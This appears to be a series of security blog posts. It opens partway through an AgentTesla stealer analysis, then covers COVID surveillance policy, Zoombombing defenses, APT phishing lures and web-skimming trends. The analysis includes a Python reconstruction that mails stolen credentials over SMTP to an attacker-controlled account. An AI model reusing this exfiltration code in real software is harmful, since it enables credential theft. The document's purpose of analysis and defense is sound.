Figure 9. Building the SMTP message.
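The exfiltration step itself is plain SMTP over SSL. A rough Python equivalent of what the sample does is below; the account, recipient, and subject are placeholders, since the real values are hardcoded in the malware:

    import smtplib
    from email.mime.text import MIMEText

    SENDER = RECIPIENT = "actor@yandex.example"  # placeholder address
    PASSWORD = "placeholder"

    # The collected credentials and machine info, rendered as HTML tables.
    msg = MIMEText("<html><body><table>...stolen data...</table></body></html>", "html")
    msg["Subject"], msg["From"], msg["To"] = "collected data", SENDER, RECIPIENT

    with smtplib.SMTP_SSL("smtp.yandex.com", 465) as server:  # SSL enabled
        server.login(SENDER, PASSWORD)
        server.send_message(msg)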

The following diagram shows the whole process described above, from extraction of the first payload from the image resource to exfiltration of the stolen information over SMTP:

Figure 10. Process diagram.

Popular stealer looking to expand

Since AgentTesla added the WiFi-stealing feature, we believe the threat actors may be considering using WiFi as a mechanism for spread, similar to what was observed with Emotet. Another possibility is using the WiFi profile to set the stage for future attacks.

Either way, Malwarebytes users were already protected from this new variant of AgentTesla through our real-time protection technology.


Indicators of compromise

AgentTesla samples:

91b711812867b39537a2cd81bb1ab10315ac321a1c68e316bf4fa84badbc09b
dd4a43b0b8a68db65b00fad99519539e2a05a3892f03b869d58ee15fdf5aa044
27939b70928b285655c863fa26efded96bface9db46f35ba39d2a1295424c07b

First payload:

249a503263717051d62a6d65a5040cf408517dd22f9021e5f8978a819b18063b

Second payload: 

63393b114ebe2e18d888d982c5ee11563a193d9da3083d84a611384bc748b1b0

The post New AgentTesla variant steals WiFi credentials appeared first on Malwarebytes Labs.

Mass surveillance alone will not save us from coronavirus

As the pattern-shattering truth of our new lives drains heavy—as coronavirus rends routines, raids our wellbeing, and whiplashes us between anxiety and fear—we should not look to mass digital surveillance to bring us back to normal.

Already, governments have cast vast digital nets. South Koreans are tracked through GPS location history, credit card transactions, and surveillance camera footage. Israelis learned last month that their mobile device locations were surreptitiously collected for years. Now, the government rummages through this enormous database in broad daylight, this time to track the spread of COVID-19. Russians cannot leave home in some regions without scanning QR codes that restrict their time spent outside—three hours for grocery shopping, one hour to walk the dog, half that to take out the trash.

Privacy advocates around the world have sounded the alarm. This month, more than 100 civil and digital rights organizations urged that any government’s coronavirus-targeted surveillance mechanisms respect human rights. The groups, which included Privacy International, Human Rights Watch, Open Rights Group, and the Chilean nonprofit Derechos Digitales, wrote in a joint letter:

“Technology can and should play an important role during this effort to save lives, such as to spread public health messages and increase access to health care. However, an increase in state digital surveillance powers, such as obtaining access to mobile phone location data, threatens privacy, freedom of expression and freedom of association, in ways that could violate rights and degrade trust in public authorities – undermining the effectiveness of any public health response.”

The groups are right to worry.

Particularly in the United States, our country’s history of emergency-enabled surveillance has failed to respect Americans’ right to privacy and to provide measurable, increased security. Not only did rapid surveillance authorization in the US permit the collection of, at one point in time, nearly every American’s call detail records, it also created an unwieldy government program that two decades later became ineffective, economically costly, and repeatedly noncompliant with the law.

Further, some of the current technology tracking proposals—including Apple and Google’s newly announced Bluetooth capabilities—either lack the evidence to prove them effective or require a degree of mass adoption that no country has proved possible. Other private proposals come from untrusted actors, too.

Finally, the tech-focused solutions cannot alone fill severe physical gaps, including a lack of personal protective equipment for medical professionals, non-existent universal testing, and a potentially fatal shortage of intensive care unit beds in a country-wide outbreak.

We understand how today feels. In less than one month, the world has emptied. Churches, classrooms, theaters, and restaurants lay vacant, sometimes shuttered by wooden planks fastened over doorways. We grieve the loss of family and friends, of 17 million American jobs and the healthcare benefits they provided, of national, in-person support networks displaced into cyberspace, where the type of vulnerability meant for a physical room is now thrust online.

For a seemingly endless time at home, we curl and wait, emptied all the same.

But mass, digital surveillance alone will not make us whole.

Governments expand surveillance to track coronavirus

First detected in late 2019 in the Hubei province of China, COVID-19 has now spread across every continent except Antarctica.

To limit the spread of the virus and to keep healthcare systems from being overburdened, governments imposed a variety of physical restrictions. California closed all non-essential businesses, Ireland restricted outdoor exercise to within 1.2 miles of the home, El Salvador placed 30-day quarantines on Salvadorans entering the country from abroad, and Tunisia imposed a nightly 6:00 p.m. to 6:00 a.m. curfew.

A handful of governments took digital action, vacuuming up citizens’ cell phone data, sometimes including their rough location history.

Last month, Israel unbuttoned a once-secret surveillance program, allowing it to reach into Israelis’ mobile phones not to provide counter-terrorism measures—as previously reserved—but to track the spread of COVID-19. The government plans to use cell phone location data that it had been privately collecting from telecommunications providers to send text messages to device owners who potentially come into contact with known coronavirus carriers. According to The New York Times, the parliamentary subcommittee meant to approve the program’s loosened restrictions never actually voted.

The Lombardy region of Italy—which, until recently, suffered the largest coronavirus swell outside of China—is working with a major telecommunications company to analyze reportedly anonymized cell phone location data to understand whether physical lockdown measures are proving effective at fighting the virus. The Austrian government is doing the same. Similarly, the Pakistani government is relying on provider-supplied location information to send targeted SMS messages to anyone who has come into close, physical contact with confirmed coronavirus patients. The program can only be as effective as it is large, requiring data on massive swaths of the country’s population.

In Singapore, the country’s government publishes grossly detailed information about coronavirus patients on its Ministry of Health public website. Ages, workplaces, workplace addresses, travel history, hospital locations, and residential streets can all be found with a simple click.

Singapore’s coronavirus detection strategy also included a separate, key component.

Last month, the government rolled out a new, voluntary mobile app for citizens to download called TraceTogether. The app relies on Bluetooth signals to detect when a confirmed coronavirus patient comes into close physical proximity with device owners using the same app. It is essentially a high-tech approach to the low-tech detective work of “contact tracing,” in which medical experts interview those with infectious illnesses and determine who they spoke to, what locations they visited, and what activities they engaged in for several days before presenting symptoms.

These examples of increased government surveillance and tracking are far from exceptional.

According to a Privacy International analysis, at least 23 countries have deployed some form of telecommunications tracking to limit the spread of coronavirus, while 14 countries are developing or have already developed their own mobile apps, including Brazil and Iceland, along with Germany and Croatia, which are both trying to make apps that are GDPR-compliant.

While some countries have relied on telecommunications providers to supply data, others are working with far more questionable private actors.

Rapid surveillance demands rapid, shaky infrastructure

Last month, the push to digitally track the spread of coronavirus came not just from governments, but from companies that build potentially privacy-invasive technology.

Last week, Apple and Google announced a joint effort to provide Bluetooth contact tracing capabilities between the billions of iPhone and Android devices in the world.

The two companies promised to update their devices so that public health experts could develop mobile apps that allow users to voluntarily identify if they have tested positive for coronavirus. If a confirmed coronavirus app user comes into close enough contact with non-infected app users, those latter users could be notified about potential infection, whether they own an iPhone or Android.

Both Apple and Google promised a privacy-protective approach. App users will not have their locations tracked, and their identities will remain inaccessible to Apple, Google, and governments. Further, devices will automatically change users’ identifiers every 15 minutes, a step toward preventing identification of device owners. Data that is processed on devices will never leave a device unless a user chooses to share it.
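To see why the rotation matters, consider a toy sketch of the idea. This is not the actual Apple/Google specification—just an illustration of how a device can broadcast identifiers that look random to observers, yet remain verifiable by anyone who is later given the day’s key:

    import hashlib
    import os
    import time

    INTERVAL = 15 * 60  # identifiers rotate every 15 minutes

    daily_key = os.urandom(32)  # never leaves the device unless shared

    def identifier_at(now: float, key: bytes) -> bytes:
        # Toy derivation: hash the daily key with the 15-minute interval index.
        interval = int(now // INTERVAL)
        return hashlib.sha256(key + interval.to_bytes(4, "big")).digest()[:16]

    # Nearby phones log the identifiers they hear, with timestamps.
    heard = [(identifier_at(time.time(), daily_key), time.time())]

    # If this user later tests positive and chooses to share daily_key, other
    # phones can recompute its identifiers and check them against their logs.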

In terms of privacy protection, Apple and Google’s approach is one of the better options today.

According to Bloomberg, the Israeli firm NSO Group pitched a variety of governments across the world about a new tool that can allegedly track the spread of coronavirus. As of mid-March, about one dozen governments began testing the technology.

A follow-on investigation by VICE revealed how the new tool, codenamed “Fleming,” actually works:

“Fleming displays the data on what looks like an intuitive user interface that lets analysts track where people go, who they meet, for how long, and where. All this data is displayed on heat maps that can be filtered depending on what the analyst wants to know. For example, analysts can filter the movements of a certain patient by their last location or whether they visited any meeting places like public squares or office buildings. With the goal of protecting people’s privacy, the tool tracks citizens by assigning them random IDs, which the government—when needed—can de-anonymize[.]”

These are dangerous, invasive powers for any government to use against its citizens. The privacy concerns only grow when looking at NSO Group’s recent history. In 2018, the company was sued over allegations that it used its powerful spyware technology to help the Saudi Arabian government spy on and plot the murder of former Washington Post writer and Saudi dissident Jamal Khashoggi. Last year, NSO Group was hit with a major lawsuit from Facebook, alleging that the company sent malware to more than 1,400 WhatsApp users, who included journalists, human rights activists, and government officials.  

The questionable private-public partnerships don’t stop there.

According to The Wall Street Journal, the facial recognition startup Clearview AI—which claims to have the largest database of public digital likenesses—is working with US state agencies to track those who tested positive for coronavirus.

The New York-based startup has repeatedly boasted about its technology, saying previously that it helped the New York Police Department quickly identify a terrorism suspect. But when BuzzFeed News asked the police department about that claim, it denied that Clearview participated in the case.

Further, according to a Huffington Post investigation, Clearview’s history involves coordination with far-right extremists, one of whom marched in the “Unite the Right” rally in Charlottesville, another who promoted debunked conspiracy theories online, and another who is an avowed Neo-Nazi. One early adviser to the startup once viewed its facial recognition technology as a way to “identify every illegal alien in the country.”

Though Clearview told The Huffington Post that it separated itself from these extremists, its founder Hoan Ton-That appears unequipped to grapple with the broader privacy questions his technology invites. When interviewed earlier this year by The New York Times, Ton-That looked flat-footed in the face of obvious questions about the ability to spy on nearly any person with an online presence. As reporter Kashmir Hill wrote:

“Even if Clearview doesn’t make its app publicly available, a copycat company might, now that the taboo is broken. Searching someone by face could become as easy as Googling a name. Strangers would be able to listen in on sensitive conversations, take photos of the participants and know personal secrets. Someone walking down the street would be immediately identifiable—and his or her home address would be only a few clicks away. It would herald the end of public anonymity.

Asked about the implications of bringing such a power into the world, Mr. Ton-That seemed taken aback.

“I have to think about that,” he said. “Our belief is that this is the best use of the technology.”

One company’s beliefs about how to “best” use invasive technology is too low a bar for us to build a surveillance mechanism upon.

Should we deploy mass surveillance?

Amidst the current health crisis, multiple digital rights and privacy organizations have tried to answer the question of whether governments should deploy mass surveillance to battle coronavirus. What has emerged, rather than wholesale approvals or objections to individual surveillance programs across the world, is a framework to evaluate incoming programs.

According to Privacy International and more than 100 similar groups, government surveillance to fight coronavirus must be necessary and proportionate, must only continue for as long as the pandemic, must only be used to respond to the pandemic, must account for potential discrimination caused by artificial intelligence technologies, and must allow individuals to challenge any data collection, aggregation, retention, and use, among other restrictions.

Electronic Frontier Foundation, which did not sign Privacy International’s letter, published a somewhat similar list of surveillance restrictions, and boiled down its evaluation even further to a simple, three-question rubric:  

  • First, has the government shown its surveillance would be effective at solving the problem?
  • Second, if the government shows efficacy, we ask: Would the surveillance do too much harm to our freedoms?
  • Third, if the government shows efficacy, and the harm to our freedoms is not excessive, we ask: Are there sufficient guardrails around the surveillance? (Which the organization detailed here.)

We do not claim keener insight than our digital privacy peers. In fact, much of our research relies on theirs. But by focusing on the types of surveillance installed currently, and past surveillance installed years ago, we err cautiously against any mass surveillance regime developed specifically to track and limit the spread of coronavirus.

Flatly, the rapid deployment of mass surveillance to protect the public has rarely, if ever, worked as intended. Mass surveillance has not provably “solved” a crisis, and in the United States, one emergency surveillance regime grew into a bloated, ineffective, noncompliant warship, apparently rudderless today.

We should not take these same risks again.

The lessons of Section 215

On October 4, 2001, less than one month after the US suffered the worst attack on American soil when terrorists felled the World Trade Center towers on September 11, President George W. Bush authorized the National Security Agency to collect certain phone content and metadata without first obtaining warrants.

According to an NSA Inspector General’s working draft report, President Bush’s authorization was titled “Authorization for specified electronic surveillance activities during a limited period to detect and prevent acts of terrorism within the United States.”

In 2006, the described “limited period” powers continued, as Attorney General Alberto Gonzales argued before a secretive court that the court should retroactively legalize what the NSA had been doing for five years—collecting the phone call metadata of nearly every American, potentially revealing the numbers we called, the frequency we dialed them, and for how long we spoke. The court later approved the request.

The Attorney General’s arguments partially cited a separate law passed by Congress in 2001 that introduced a new surveillance authority for the NSA titled Section 215, which allows for the collection of “call detail records”—logs of phone calls, but not their content. Though Section 215 received significant reforms in 2015, it lingers today. Only recently has the public learned about collection failures under its authority.

In 2018, the NSA erased hundreds of millions of call and text detail records collected under Section 215 because the NSA could not reconcile their collection with the actual requirements of the law. In February, the public also learned that, despite collecting countless records across four years, only twice did the NSA uncover information that the FBI did not already have. Of those two occasions, only once did the information lead to an investigation.

Complicating the matter, the NSA shut down the call detail record program in the summer of 2019, yet the program’s legal authority remains in limbo: the Senate approved a 77-day extension in mid-March, but the House of Representatives is not scheduled to return to Congress until early May.

If this sounds frustrating, it is, and Senators and Representatives on both sides of the aisle have increasingly questioned these surveillance powers.

Remember, this is how difficult it is to dismantle a surveillance machine with proven failures. We doubt it will be any easier to dismantle whatever regime the government installs to fight coronavirus.

Separate from our recent history of over-extended surveillance is the matter of whether data collection actually works at tracking and limiting coronavirus.

So far, results range from unclear to mixed.

The problems with location and proximity tracking

In 2014, government officials, technologists, and humanitarian groups installed large data collection regimes to track and limit the spread of the Ebola outbreak in West Africa.

Harvard’s School of Public Health used cell phone “pings” to chart rough estimates of callers’ locations based on the cell towers they connected to when making calls. The US Centers for Disease Control and Prevention similarly looked at cell towers that received high numbers of emergency phone calls to determine, in near real time, whether an outbreak was occurring.

But according to Sean McDonald of the Berkman Klein Center for Internet and Society at Harvard University, little evidence exists to show whether location tracking helps prevent the spread of illnesses at all.

In a foreword to his 2016 paper “Ebola: A big data disaster,” McDonald analyzed South Korea’s 2015 response to Middle East Respiratory Syndrome (MERS), an illness caused by a different coronavirus. To limit the spread, the South Korean government grabbed individuals’ information from the country’s mobile phone providers and implemented a quarantine on more than 17,000 people based on their locations and the probabilities of infection.

But the South Korean government never opened up about how it used citizens’ data, McDonald wrote.

“What we don’t know is whether that seizure of information resulted in a public good,” McDonald wrote. “Quite the opposite, there is limited evidence to suggest that migration or location information is a useful predictor of the spread of MERS at all.”

Further, recent efforts to provide contact tracing through Bluetooth connectivity, which is not the same as location tracking, have not been tested on a large enough scale to prove effective.

According to a mid-March report from The Economist, just 13 percent of Singapore’s population had installed the country’s contact tracing app, TraceTogether. That low adoption rate looks even worse when gauging the app’s odds of success in fighting coronavirus.

According to The Verge, if Americans installed a Bluetooth contact tracing app at the same rate as Singaporeans, the likelihood of being notified because of a chance encounter with another app user would be just 1.44 percent. The math is unforgiving: a chance encounter only registers if both parties have the app installed, so the odds are roughly the adoption rate squared.
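
As a quick sanity check of that figure (our arithmetic, not The Verge’s published worksheet; a result of 1.44 percent implies an adoption rate of about 12 percent):

    # A chance encounter is only recorded if BOTH phones run the app,
    # so the notification odds are roughly the adoption rate squared.
    adoption = 0.12                # assumed app adoption rate (~12 percent)
    print(f"{adoption ** 2:.2%}")  # prints "1.44%"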

Worse, according to Dr. Farzad Mostashari, former national coordinator for health information technology at the Department of Health and Human Services, Bluetooth contact tracing could create many false positives. As he told The Verge:

“If I am in the wide open, my Bluetooth and your Bluetooth might ping each other even if you’re much more than six feet away. You could be through the wall from me in an apartment, and it could ping that we’re having a proximity event. You could be on a different floor of the building and it could ping.”

This does not mean Bluetooth contact tracing is a bad idea, but it isn’t the silver bullet some imagine. Until it has been tested at scale, we should treat its effectiveness as unproven, just as we do location tracking’s.
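
Dr. Mostashari’s walls-and-floors problem shows up in the arithmetic these apps typically rely on. Here is a minimal Python sketch of the log-distance path-loss model commonly used to turn Bluetooth signal strength (RSSI) into an approximate distance; every constant is an illustrative assumption, not any real app’s calibration:

    # Estimate distance from Bluetooth received signal strength (RSSI).
    # tx_power_dbm is the assumed RSSI at 1 meter (varies by phone model);
    # the path-loss exponent is roughly 2.0 in open air, higher indoors.
    def estimated_distance_m(rssi_dbm, tx_power_dbm=-59, path_loss_exponent=2.0):
        return 10 ** ((tx_power_dbm - rssi_dbm) / (10 * path_loss_exponent))

    # The same -75 dBm reading maps to very different distances depending
    # on the environment, which is exactly how false positives happen:
    print(estimated_distance_m(-75))                          # open air: ~6.3 m
    print(estimated_distance_m(-75, path_loss_exponent=3.0))  # indoors: ~3.4 m

Because one RSSI reading is consistent with both a distant phone in open air and a nearby phone behind a wall or floor, any proximity event inferred this way carries built-in noise.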

Stay safe

Today is exhausting, and, sadly, tomorrow will be, too. We don’t have the answers to bring things back to normal. We don’t know if those answers exist.

What we do know is that, understandably, now is a time of fear. That is normal. That is human.

But we should avoid letting fear dictate decisions of such significance. In the past, mass surveillance has grown unwieldy, lasted longer than planned, and proved ineffective. Today, it is being driven by opportunistic private actors whom we should not trust as the sole gatekeepers to expanded government powers.

We have no proof that mass surveillance alone will solve this crisis. Only fear lets us believe it will.


Keep Zoombombing cybercriminals from dropping a load on your meetings

While shelter in place has left many companies struggling to stay in business during the COVID-19 epidemic, one company in particular has seen its fortunes rise dramatically. Zoom, the US-based maker of teleconferencing software, has become the web conference tool of choice for employees working from home (WFH), friends coming together for virtual happy hour, and families trying to stay connected. Since March 15, Zoom has occupied the top spot on Apple’s App Store. Only one week prior, Zoom was the 103rd-most popular app. 

Even late-night talk show hosts have jumped on the Zoom bandwagon, with Samantha Bee, Stephen Colbert, Jimmy Fallon, and Jimmy Kimmel using a combination of Zoom and cellphone video to produce their respective shows from home. 

In an incredibly zeitgeisty moment, everyone and their parents are Zooming. Unfortunately, opportunistic cybercriminals, hackers, and Internet trolls are Zooming, too.

What is Zoombombing?

Since the call for widespread sheltering in place, a number of security exploits have been discovered in Zoom’s software. Most notably, a technique called Zoombombing has risen in popularity, whether for pure mischief or more criminal purposes.

Zoombombing, also known as Zoom squatting, occurs when an unauthorized user joins a Zoom conference, either by guessing the Zoom meeting ID number, reusing a Zoom meeting ID from a previous meeting, or using a Zoom ID received from someone else. In the latter case, the Zoom meeting ID may have been shared with the Zoombomber by someone who was actually invited to the meeting or circulated among Zoombombers online.  
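
Back-of-the-envelope arithmetic shows why guessing alone is viable; every figure below is an illustrative assumption on our part, not Zoom’s actual numbers:

    # Why guessing meeting IDs is feasible: a sketch with assumed figures.
    id_space = 10 ** 9          # assume 9-digit meeting IDs
    active_meetings = 200_000   # assumed concurrently active meetings
    guesses_per_hour = 100_000  # assumed automated guessing rate

    hit_rate = active_meetings / id_space  # chance a single guess lands
    print(f"hit rate per guess: {hit_rate:.4%}")                              # 0.0200%
    print(f"expected valid IDs per hour: {guesses_per_hour * hit_rate:.0f}")  # 20

Any meeting found this way that lacks a password can simply be joined, which is why the settings covered later in this post matter.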

The relative ease by which Zoombombing can happen has led to a number of embarrassing and offensive episodes.

In one incident, a pornographic video appeared during a Zoom meeting hosted by a Kentucky college. During online instruction at a high school in San Diego, a racist word was typed into the classroom chat window while another bomber held up a sign that said the teacher “Hates Black People.” And in another incident, a Zoombomber drew male genitalia on screen while a doctoral candidate defended his dissertation.

Serious Zoombombing shenanigans

The Zoombombing problem has gotten so bad that the US Federal Bureau of Investigation has issued a warning.

That said, it’s the Zoombombs no one notices that are most worrying, especially for Zoom’s business customers. Zoombombers can discreetly enter a Zoom conference, capture screenshots of confidential screenshares, and record video and audio from the meeting. While it’s unlikely a participant will put up a slide showing their username and password, the information gleaned from a Zoom meeting can be used in a phishing or spear phishing attack.

As of right now, there hasn’t been a publicly disclosed data breach as a result of a Zoombomb, but the notion isn’t far-fetched.

Numerous organizations and educational institutions have announced they will no longer be using Zoom. Of note, Google has banned the use of Zoom on company-owned devices in favor of its own Google Hangouts. The New York City Department of Education announced it would no longer be using Zoom for remote learning. And Elon Musk’s SpaceX has banned Zoom, noting “significant privacy and security concerns” in a company-wide memo.

“Most Zoombombing incidents can be prevented with a little due diligence on the part of the user,” Malwarebytes Head of Security John Donovan said. “Anyone using Zoom, or any web conference software for that matter, is strongly encouraged to review their conference settings and minimize the permissions allowed for their conference attendees.”

“You can’t walk into a high school history class and start heckling the teacher. Unfortunately, the software lets people do that if you’re not careful,” he added.

For its part, Zoom has published multiple blog posts acknowledging the security issues with its software, the changes the company has made to shore up security, and tips for keeping conferences private.

How to schedule a meeting in Zoom safely: set your meeting ID to generate automatically and always require a password.

Keep your Zoom meetings secure

Here are our tips for keeping your Zoom meetings secure and free from Zoombombers. Keep in mind that many of these tips apply to other teleconferencing tools as well. 

  1. Generate a unique meeting ID. Using your personal ID for meetings is like having an open-door policy—anyone can pop in at any time. Granted, it’s convenient and easy to remember. However, if a Zoombomber successfully guesses your personal ID, they can drop in on your meetings whenever they want or even share your meeting ID with others.
  2. Set a password for each meeting. Even if you have a unique meeting ID, an invited participant can still share your meeting ID with someone outside your organization. Adding a password to your meeting is one more layer of security you can add to keep interlopers out.
  3. Allow signed-in users only. With this option, it won’t matter if Zoombombers have the meeting ID—even the password. This setting requires everyone to be signed in to Zoom using the email they were invited through.
  4. Use the waiting room. With the waiting room, the meeting doesn’t start until the host arrives and adds everyone to it. Attendees can’t communicate with one another while they wait. This gives you one additional layer of manual verification before anyone can join your meeting.
  5. Enable the chime when users join or leave the meeting. Besides giving you a reason to embarrass late arrivals, the chime ensures no one can join your meeting undetected. The chime is usually on by default, so you may want to check to make sure you haven’t turned it off in your settings.
  6. Lock the room once the meeting has begun. Once all expected attendees have joined, lock the meeting. It seems simple, but it’s another easy way to keep Zoombombing at bay.
  7. Limit screen sharing. Before the meeting starts, you can restrict who can share their screen to just the host. And during the meeting, you can change this setting on the fly, in case a participant ends up needing to show something.

A special note for IT administrators: As a matter of company policy, many of these Zoom settings can be set to default. You can even further lock down settings for a particular group of users with access to sensitive information (or those with a higher learning curve on cybersecurity hygiene). For more detailed information, see the Zoom Help Center.

Remember, Zoombombing isn’t just embarrassing—it’s a big security risk. Sure, the Zoombombing incidents making headlines at the moment seem to be about trolling people more than anything else, but the potential for more serious abuse exists.

No matter which web conferencing software you use, take a moment to learn its settings and make smart choices about the data you share in your meetings. Do this, and you’ll have a safe and happy socially distanced gathering each time you sign on.


Lock and Code S1Ep4: coronavirus and responding to computer viruses with Akshay Bhargava

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Akshay Bhargava, Chief Product Officer of Malwarebytes, about the similarities between coronavirus and computer viruses. We discuss computer virus prevention, detection, and response, and the simple steps that consumers and businesses can take today to better protect themselves from a spreading cyberattack.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store and Google Play Music, or on whatever podcast platform you prefer.

We cover our own research on:

Plus other cybersecurity news:

Stay safe, everyone!


APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure

The coronavirus (COVID-19) has become a global pandemic, and this is a golden time for attackers to take advantage of our collective fear and increase the likelihood of a successful attack. True to form, they’ve been doing just that: running spam and spear phishing campaigns that use coronavirus as a lure against government and non-government entities.

From late January on, several cybercriminal and state-sponsored advanced persistent threat (APT) groups have been using coronavirus-themed phishing as their infection vector to gain a foothold on victim machines and launch malware attacks. Mirroring the spread of the virus itself, the attacks hit China first, then followed the pandemic worldwide.

In the following paper, we provide an overview of APT groups that have been using coronavirus as a lure, and we analyze their infection techniques and eventual payloads. We categorize the APT groups based on the four attack vectors used in their COVID-19 campaigns: template injection, malicious macros, RTF exploits, and malicious LNK files.

You can view the full report on APTs using COVID-19 HERE.

Attack vectors

  • Template injection: Template injection refers to a technique in which actors embed a reference in the lure document’s XML settings that points to a remote, malicious Office template. Upon opening the document, the remote template is fetched and executed. The Kimsuky and Gamaredon APTs used this technique (see the detection sketch after this list).
  • Malicious macros: Embedding malicious macros is the most popular method used by threat groups. In this technique, a macro is embedded in the lure document that will be activated upon opening. Konni (APT37), APT36, Patchwork, Hades, TA505, TA542, Bitter, APT32 (Ocean Lotus) and Kimsuky are the actors using this technique.
  • RTF exploits: RTF is a flexible text format that allows any object type to be embedded within it, which leaves RTF files open to many OLE object-related vulnerabilities. Several Chinese threat actors use RTF files, among them the Calypso group and Winnti.
  • Malicious LNK files: An LNK file is a shortcut file used by Microsoft Windows and is considered a shell item type that can be executed. Mustang Panda is a Chinese threat actor that uses this technique to drop either a variant of the PlugX RAT or Cobalt Strike onto victims’ machines. Higaisia is a North Korean threat group that also uses this method.
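
Remote template injection leaves a telltale artifact: an external URL in the document’s relationship files. Below is a minimal defender-side sketch of our own (not taken from the report) that flags .docx files whose settings relationships point to a remote template; the location checked, word/_rels/settings.xml.rels, is an assumption based on standard Office packaging:

    # Flag .docx files whose settings relationships point to an external
    # template URL, the hallmark of remote template injection.
    import re
    import sys
    import zipfile

    def external_template_targets(docx_path):
        """Return external Target URLs found in word/_rels/settings.xml.rels."""
        with zipfile.ZipFile(docx_path) as doc:
            try:
                rels = doc.read("word/_rels/settings.xml.rels").decode("utf-8", "replace")
            except KeyError:
                return []  # no settings relationships, nothing to flag
        # External relationships carry TargetMode="External"; grab their targets.
        return [
            target
            for target, mode in re.findall(
                r'Target="([^"]+)"[^>]*?TargetMode="([^"]+)"', rels
            )
            if mode == "External" and target.lower().startswith("http")
        ]

    if __name__ == "__main__":
        for url in external_template_targets(sys.argv[1]):
            print("suspicious remote template:", url)

A document whose template resolves to a host outside the organization is worth quarantining for a closer look.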

We expect that in the coming weeks and months, APT threat actors will continue to leverage this crisis to craft phishing campaigns using the techniques mentioned in the paper to compromise their targets.

The Malwarebytes Threat Intelligence Team is monitoring the threat landscape and paying particular attention to attacks trying to abuse the public’s fear around the COVID-19 crisis. Our Malwarebytes consumer and business customers are protected against these attacks, thanks to our multi-layered detection engines.


Online credit card skimming increased by 26 percent in March

Crisis events such as the current COVID-19 pandemic often lead to a change in habits that captures the attention of cybercriminals. With the confinement measures imposed in many countries, for example, online shopping has soared, and along with it, credit card skimming. According to our data, web skimming increased by 26 percent in March over the previous month.

While this might not seem like a dramatic jump, digital credit card skimming was already on the rise prior to COVID-19, and this trend will likely continue into the near future.

While many merchants remain safe despite the increased volume of processed transactions, shoppers’ exposure to compromised e-commerce stores is greater than ever.

Change in habits translates into additional web skimming attempts

Web skimming, a practice known under several names but popularized by the ‘Magecart’ moniker, is the process of stealing customer data, including credit card information, from compromised online stores.

We actively track web skimmers so that we can protect our customers running Malwarebytes or Browser Guard (the browser extension) when they shop online.

The stats presented below exclude any telemetry from our Browser Guard extension and reflect a portion of the overall web skimming landscape, per our own visibility. For instance, server-side skimmers will go unaccounted for, unless the merchant site itself has been identified as compromised and is blacklisted.

One trend we have noticed for a while is that the number of skimming blocks is at its highest on Mondays, declines in the second half of the week, and reaches its lowest point on weekends.

[Chart: web skimming blocks by day of the week]

The second observation is that the number of web skimming blocks increased moderately from January to February (2.5 percent) but then jumped from February to March (26 percent). While this is still a moderate increase, we believe it marks a trend that will become more apparent in the coming months.

[Chart: month-over-month web skimming blocks, January through March]

The final chart shows that we record the most skimming attempts in the US, followed by Australia and Canada. This trend coincides with the quarantine measures that began rolling out in mid-March.

[Chart: web skimming blocks by country]

Minimizing risks: a shared responsibility

As we see with other threats, there isn’t one single answer to web skimming. It can be fought from many different sides, starting with online merchants, the security community, and shoppers themselves.

A great number of merchants do not keep their platforms up to date and fail to respond to security disclosures. Oftentimes, the last recourse for reporting a breach is to go public and hope that the media attention bears fruit.

Many security vendors actively track web skimmers and add protection capabilities to their products. This is the case with Malwarebytes: web protection is available in both our desktop product and our browser extension. Sharing our findings and attempting to disrupt skimming infrastructure tackles the problem at scale, rather than on an individual (per-site) basis.

Shopping online is convenient but not risk-free. Ultimately, users are the ones who can make savvy choices and avoid many pitfalls. Here are some recommendations:

  • Limit the number of times you have to manually enter your credit card data. Rely on platforms where that information is already stored in your account or use one-time payment options.
  • Check if the online store displays properly in your browser, without any errors or certain red flags indicating that it has been neglected.
  • Do not take trust seals or other indicators of confidence at face value. Just because a site displays a logo saying it’s 100 percent safe does not mean it actually is.
  • If you are unsure about a site, you can use certain tools to scan it for malware or to see if it’s already on a blacklist.
  • More advanced users may want to examine a site’s source code, using Developer Tools for instance, which as a side effect may cause a skimmer that checks for inspection to turn itself off. A rough starting point for such a check is sketched after this list.
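
For that last tip, here is a rough Python sketch of our own (not a Malwarebytes tool) that lists the third-party hosts a checkout page loads scripts from, so anything unfamiliar can be eyeballed. The URL is a placeholder, and the ‘requests’ package is a third-party dependency:

    # List external script-source hosts on a page for manual review.
    import re
    from urllib.parse import urlparse

    import requests  # third-party; pip install requests

    def external_script_hosts(page_url):
        """Return script-source hosts that differ from the page's own host."""
        page_host = urlparse(page_url).netloc
        html = requests.get(page_url, timeout=10).text
        hosts = {
            urlparse(src).netloc
            for src in re.findall(r'<script[^>]+src="(https?://[^"]+)"', html)
        }
        return sorted(h for h in hosts if h != page_host)

    for host in external_script_hosts("https://shop.example.com/checkout"):
        print(host)  # unfamiliar hosts here deserve a closer look

Keep in mind that skimmers injected directly into a site’s own first-party files won’t show up this way, which is another reason layered protection matters.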

We expect web skimming activity to keep trending upward in the coming months, as the online shopping habits forged during this pandemic continue well beyond it. For more tips, please check out Important tips for safe online shopping post COVID-19.
